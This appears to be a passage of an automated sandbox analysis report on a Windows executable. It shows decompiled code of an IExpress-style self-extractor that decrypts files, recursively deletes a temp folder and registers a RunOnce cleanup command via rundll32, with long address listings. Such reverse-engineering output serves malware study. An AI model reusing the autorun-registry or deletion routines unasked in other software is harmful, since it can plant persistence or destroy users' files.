                                                                                                                                                                                                                                                0x00102ff5
                                                                                                                                                                                                                                                0x00102fee
                                                                                                                                                                                                                                                0x00102fd4
                                                                                                                                                                                                                                                0x00102ff8
                                                                                                                                                                                                                                                0x00102ffe
                                                                                                                                                                                                                                                0x00103004
                                                                                                                                                                                                                                                0x00103017
                                                                                                                                                                                                                                                0x0010301c
                                                                                                                                                                                                                                                0x00103024
                                                                                                                                                                                                                                                0x00103054
                                                                                                                                                                                                                                                0x0010305a
                                                                                                                                                                                                                                                0x00103065
                                                                                                                                                                                                                                                0x00103065
                                                                                                                                                                                                                                                0x0010306c
                                                                                                                                                                                                                                                0x0010306e
                                                                                                                                                                                                                                                0x00103075
                                                                                                                                                                                                                                                0x0010307a
                                                                                                                                                                                                                                                0x0010307a
                                                                                                                                                                                                                                                0x0010307c
                                                                                                                                                                                                                                                0x00103081
                                                                                                                                                                                                                                                0x00103087
                                                                                                                                                                                                                                                0x00103089
                                                                                                                                                                                                                                                0x001030a1
                                                                                                                                                                                                                                                0x001030a1
                                                                                                                                                                                                                                                0x001030a9
                                                                                                                                                                                                                                                0x001030ab
                                                                                                                                                                                                                                                0x001030ad
                                                                                                                                                                                                                                                0x001030af
                                                                                                                                                                                                                                                0x001030af
                                                                                                                                                                                                                                                0x001030ad
                                                                                                                                                                                                                                                0x001030b6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010308b
                                                                                                                                                                                                                                                0x0010308b
                                                                                                                                                                                                                                                0x00103091
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103093
                                                                                                                                                                                                                                                0x00103098
                                                                                                                                                                                                                                                0x0010309a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010309c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010309c
                                                                                                                                                                                                                                                0x00103089
                                                                                                                                                                                                                                                0x0010305c
                                                                                                                                                                                                                                                0x00103061
                                                                                                                                                                                                                                                0x00103063
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103063
                                                                                                                                                                                                                                                0x0010302b
                                                                                                                                                                                                                                                0x00103032
                                                                                                                                                                                                                                                0x0010303c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010303c
                                                                                                                                                                                                                                                0x00103006
                                                                                                                                                                                                                                                0x0010300c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010300e
                                                                                                                                                                                                                                                0x00103015
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103015
                                                                                                                                                                                                                                                0x00102f80
                                                                                                                                                                                                                                                0x00102f3f
                                                                                                                                                                                                                                                0x00102f46
                                                                                                                                                                                                                                                0x00102f5f
                                                                                                                                                                                                                                                0x00102f5f
                                                                                                                                                                                                                                                0x00102f64
                                                                                                                                                                                                                                                0x00102f66
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102f66
                                                                                                                                                                                                                                                0x00102f4f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102f55
                                                                                                                                                                                                                                                0x00102f5d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00102F93
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00102FB2
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00102FC6
                                                                                                                                                                                                                                                • DecryptFileA.ADVAPI32 ref: 00102FE6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00102FF8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0010301C
                                                                                                                                                                                                                                                  • Part of subcall function 001051E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00102F4D,?,00000002,00000000), ref: 00105201
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 2126469477-1002207402
                                                                                                                                                                                                                                                • Opcode ID: df861ebc162852fc3c9308ca59bf18c96a5086afa4a0d8de7321428f96858a40
                                                                                                                                                                                                                                                • Instruction ID: b0b20dbe6ab761884c96247899e1ef734ecbc44f6afb3d2f4c7996a5d3db04fc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df861ebc162852fc3c9308ca59bf18c96a5086afa4a0d8de7321428f96858a40
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F441A371B012159BDB30AB759C4966A73ACAF58750F004165F9D1C39D6EFF4CEC0CA61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00102390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E00102390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x108004; // 0xb5a2e1bc
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00106CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00101680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E001016B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00101680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E001016B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E001016B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0010658A( &_v280, 0x104, 0x101140);
								E00102390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                                                                0x00102398
                                                                                                                                                                                                                                                0x0010239e
                                                                                                                                                                                                                                                0x001023a3
                                                                                                                                                                                                                                                0x001023a5
                                                                                                                                                                                                                                                0x001023ae
                                                                                                                                                                                                                                                0x001023b3
                                                                                                                                                                                                                                                0x001024cb
                                                                                                                                                                                                                                                0x001024d2
                                                                                                                                                                                                                                                0x001024d3
                                                                                                                                                                                                                                                0x001024d4
                                                                                                                                                                                                                                                0x001024df
                                                                                                                                                                                                                                                0x001023c2
                                                                                                                                                                                                                                                0x001023d1
                                                                                                                                                                                                                                                0x001023db
                                                                                                                                                                                                                                                0x001023e4
                                                                                                                                                                                                                                                0x001023f6
                                                                                                                                                                                                                                                0x001023fc
                                                                                                                                                                                                                                                0x00102401
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102407
                                                                                                                                                                                                                                                0x00102407
                                                                                                                                                                                                                                                0x00102408
                                                                                                                                                                                                                                                0x00102411
                                                                                                                                                                                                                                                0x0010241f
                                                                                                                                                                                                                                                0x0010247a
                                                                                                                                                                                                                                                0x00102483
                                                                                                                                                                                                                                                0x00102495
                                                                                                                                                                                                                                                0x001024a3
                                                                                                                                                                                                                                                0x00102421
                                                                                                                                                                                                                                                0x0010242f
                                                                                                                                                                                                                                                0x00102453
                                                                                                                                                                                                                                                0x0010245d
                                                                                                                                                                                                                                                0x00102466
                                                                                                                                                                                                                                                0x00102472
                                                                                                                                                                                                                                                0x00102472
                                                                                                                                                                                                                                                0x0010242f
                                                                                                                                                                                                                                                0x001024af
                                                                                                                                                                                                                                                0x001024b5
                                                                                                                                                                                                                                                0x001024be
                                                                                                                                                                                                                                                0x001024c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001024c5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,00108A3A,001011F4,00108A3A,00000000,?,?), ref: 001023F6
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,001011F8), ref: 00102427
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,001011FC), ref: 0010243B
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00102495
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 001024A3
                                                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 001024AF
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 001024BE
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(00108A3A), ref: 001024C5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836429354-0
                                                                                                                                                                                                                                                • Opcode ID: 6b35ebe9f8219ca2fdeed720c17178ab4680aad7a651232e2ece6ded1f121adc
                                                                                                                                                                                                                                                • Instruction ID: a31fb94a354ae22d3e4aef464ab467008f4577e602834df29bfb9a0dd4dce759
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b35ebe9f8219ca2fdeed720c17178ab4680aad7a651232e2ece6ded1f121adc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96316C32604744ABC320EBA4CC8DAEB73A8AF94305F44492DF5D5C62D0EBF899498792
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00102BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                                                                			E00102BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x10a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x109124 = 0;
				if(E00102CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00102F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E001052B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x108a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x109a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00101F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x108588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x109124; // 0x80070002
				return _t7;
			}


















                                                                                                                                                                                                                                                0x00102c03
                                                                                                                                                                                                                                                0x00102c0d
                                                                                                                                                                                                                                                0x00102c18
                                                                                                                                                                                                                                                0x00102c20
                                                                                                                                                                                                                                                0x00102c2e
                                                                                                                                                                                                                                                0x00102c32
                                                                                                                                                                                                                                                0x00102c36
                                                                                                                                                                                                                                                0x00102c3d
                                                                                                                                                                                                                                                0x00102c43
                                                                                                                                                                                                                                                0x00102c45
                                                                                                                                                                                                                                                0x00102c47
                                                                                                                                                                                                                                                0x00102c49
                                                                                                                                                                                                                                                0x00102c4e
                                                                                                                                                                                                                                                0x00102c4e
                                                                                                                                                                                                                                                0x00102c47
                                                                                                                                                                                                                                                0x00102c32
                                                                                                                                                                                                                                                0x00102c20
                                                                                                                                                                                                                                                0x00102c50
                                                                                                                                                                                                                                                0x00102c54
                                                                                                                                                                                                                                                0x00102c57
                                                                                                                                                                                                                                                0x00102c64
                                                                                                                                                                                                                                                0x00102c66
                                                                                                                                                                                                                                                0x00102c6b
                                                                                                                                                                                                                                                0x00102c6d
                                                                                                                                                                                                                                                0x00102c74
                                                                                                                                                                                                                                                0x00102c76
                                                                                                                                                                                                                                                0x00102c7c
                                                                                                                                                                                                                                                0x00102c7e
                                                                                                                                                                                                                                                0x00102c87
                                                                                                                                                                                                                                                0x00102c89
                                                                                                                                                                                                                                                0x00102c89
                                                                                                                                                                                                                                                0x00102c87
                                                                                                                                                                                                                                                0x00102c7c
                                                                                                                                                                                                                                                0x00102c74
                                                                                                                                                                                                                                                0x00102c8e
                                                                                                                                                                                                                                                0x00102c95
                                                                                                                                                                                                                                                0x00102c98
                                                                                                                                                                                                                                                0x00102c98
                                                                                                                                                                                                                                                0x00102c9e
                                                                                                                                                                                                                                                0x00102ca7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000002,00000000,?,00106BB0,00100000,00000000,00000002,0000000A), ref: 00102C03
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00106BB0,00100000,00000000,00000002,0000000A), ref: 00102C18
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00102C28
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00106BB0,00100000,00000000,00000002,0000000A), ref: 00102C98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                • Opcode ID: 85123c320c5d88d57f5cbef786e6c941e1f0880a64931e1304674461f91bbc29
                                                                                                                                                                                                                                                • Instruction ID: 7d95df1c6c00a16b186c1e57b35a469a3e3846b0d4a72783dc2d4b8c35b808ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85123c320c5d88d57f5cbef786e6c941e1f0880a64931e1304674461f91bbc29
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A11E171300316ABE7206BB4AE9CA6F37699F883A0B444025F9C0E36D1DBF0DCC1C661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00106F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00106F40() {

				SetUnhandledExceptionFilter(E00106EF0); // executed
				return 0;
			}



                                                                                                                                                                                                                                                0x00106f45
                                                                                                                                                                                                                                                0x00106f4d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00106F45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                • Opcode ID: 261548394a1c2cebd065648e4953fd28d53848255cdeaab1156c35503c0491dd
                                                                                                                                                                                                                                                • Instruction ID: 7aa233115b4244bbf582798698f70424394a378d7daa6c119e888db617dabd34
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 261548394a1c2cebd065648e4953fd28d53848255cdeaab1156c35503c0491dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9290027425130047D6105B70DD1941979A16F4D602BC15460A091C48D5DBF040905552
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0010202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0010202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00106CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0010171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0010658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x109a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x1091e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x1091e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1091e5);
						if(_t90 != 0) {
							 *0x108580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E0010171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E001044B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0010658A( &_v268, 0x104, 0x101140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x108530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                                                                0x0010202a
                                                                                                                                                                                                                                                0x00102035
                                                                                                                                                                                                                                                0x0010203c
                                                                                                                                                                                                                                                0x00102041
                                                                                                                                                                                                                                                0x00102050
                                                                                                                                                                                                                                                0x0010205f
                                                                                                                                                                                                                                                0x00102064
                                                                                                                                                                                                                                                0x0010206f
                                                                                                                                                                                                                                                0x0010208c
                                                                                                                                                                                                                                                0x00102094
                                                                                                                                                                                                                                                0x00102257
                                                                                                                                                                                                                                                0x00102266
                                                                                                                                                                                                                                                0x00102266
                                                                                                                                                                                                                                                0x0010209a
                                                                                                                                                                                                                                                0x0010209b
                                                                                                                                                                                                                                                0x0010209d
                                                                                                                                                                                                                                                0x001020aa
                                                                                                                                                                                                                                                0x001020af
                                                                                                                                                                                                                                                0x001020c9
                                                                                                                                                                                                                                                0x001020d1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001020d3
                                                                                                                                                                                                                                                0x001020da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001020da
                                                                                                                                                                                                                                                0x001020e2
                                                                                                                                                                                                                                                0x00102103
                                                                                                                                                                                                                                                0x0010210e
                                                                                                                                                                                                                                                0x00102116
                                                                                                                                                                                                                                                0x00102122
                                                                                                                                                                                                                                                0x00102128
                                                                                                                                                                                                                                                0x0010212c
                                                                                                                                                                                                                                                0x00102179
                                                                                                                                                                                                                                                0x00102194
                                                                                                                                                                                                                                                0x001021de
                                                                                                                                                                                                                                                0x001021e4
                                                                                                                                                                                                                                                0x00102256
                                                                                                                                                                                                                                                0x00102256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102256
                                                                                                                                                                                                                                                0x00102196
                                                                                                                                                                                                                                                0x00102196
                                                                                                                                                                                                                                                0x0010219c
                                                                                                                                                                                                                                                0x0010219f
                                                                                                                                                                                                                                                0x0010219f
                                                                                                                                                                                                                                                0x001021a1
                                                                                                                                                                                                                                                0x001021a2
                                                                                                                                                                                                                                                0x001021a6
                                                                                                                                                                                                                                                0x001021a8
                                                                                                                                                                                                                                                0x001021b0
                                                                                                                                                                                                                                                0x001021b0
                                                                                                                                                                                                                                                0x001021b2
                                                                                                                                                                                                                                                0x001021b3
                                                                                                                                                                                                                                                0x001021bc
                                                                                                                                                                                                                                                0x001021c7
                                                                                                                                                                                                                                                0x001021cb
                                                                                                                                                                                                                                                0x001021f1
                                                                                                                                                                                                                                                0x001021f6
                                                                                                                                                                                                                                                0x001021fd
                                                                                                                                                                                                                                                0x001021ff
                                                                                                                                                                                                                                                0x001021ff
                                                                                                                                                                                                                                                0x00102204
                                                                                                                                                                                                                                                0x00102213
                                                                                                                                                                                                                                                0x00102218
                                                                                                                                                                                                                                                0x0010221d
                                                                                                                                                                                                                                                0x0010221d
                                                                                                                                                                                                                                                0x00102220
                                                                                                                                                                                                                                                0x00102220
                                                                                                                                                                                                                                                0x00102222
                                                                                                                                                                                                                                                0x00102223
                                                                                                                                                                                                                                                0x00102229
                                                                                                                                                                                                                                                0x0010223d
                                                                                                                                                                                                                                                0x00102249
                                                                                                                                                                                                                                                0x00102250
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102250
                                                                                                                                                                                                                                                0x001021d2
                                                                                                                                                                                                                                                0x001021d9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001021d9
                                                                                                                                                                                                                                                0x0010213a
                                                                                                                                                                                                                                                0x00102141
                                                                                                                                                                                                                                                0x00102144
                                                                                                                                                                                                                                                0x0010214c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102163
                                                                                                                                                                                                                                                0x00102172
                                                                                                                                                                                                                                                0x00102172
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102163
                                                                                                                                                                                                                                                0x001020ea
                                                                                                                                                                                                                                                0x001020f0
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00102050
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0010205F
